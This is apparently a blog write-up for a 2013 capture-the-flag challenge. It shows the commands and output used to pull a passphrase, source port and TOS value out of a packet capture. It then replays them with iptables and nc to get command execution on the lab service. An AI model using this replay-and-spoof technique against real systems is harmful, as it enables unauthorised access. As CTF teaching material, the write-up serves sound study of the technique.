hacktracking: # NcN CTF 2k13: USA (Flag)

# tcpflow -C -r traffic.pcap
HELLO! What do you want? 
ERMAHGERD_LEMME_EXECUTE

FINE!
Only one command...
$ 
# tshark -n -q -r traffic.pcap -z "follow,tcp,ascii,0"
===================================================================
Follow: tcp,ascii
Filter: tcp.stream eq 0
Node 0: 192.168.100.15:6969
Node 1: 192.168.100.254:45887
26
 HELLO! What do you want? 
 24
ERMAHGERD_LEMME_EXECUTE

33
 FINE!
 Only one command...
 $ 
===================================================================
# scapy
>>> us=rdpcap("traffic.pcap")
>>> us[0]
<Ether  dst=00:16:3e:63:a1:f6 src=fe:ff:ff:ff:ff:ff type=0x800 |<IP  version=4L ihl=5L tos=0x90 len=60 id=47950 flags=DF frag=0L ttl=64 proto=tcp chksum=0x347f src=192.168.100.254 dst=192.168.100.15 options=[] |<TCP  sport=45887 dport=6969 seq=201010478 ack=0 dataofs=10L reserved=0L flags=S window=14600 chksum=0x4a8d urgptr=0 options=[('MSS', 1460), ('SAckOK', ''), ('Timestamp', (2070112, 0)), ('NOP', None), ('WScale', 7)] |>>>
>>> exit()
# iptables --table mangle --append PREROUTING --dport 6969 --jump TOS --set-tos 0x90
# nc --source-port 45887 192.168.69.5 6969
HELLO! What do you want? ERMAHGERD_LEMME_EXECUTE
FINE!
Only one command...
$ echo 'CookieMonsters' > /tmp/SCORE_POINTS
# NcN CTF 2k13: USA (Flag)

No comments:
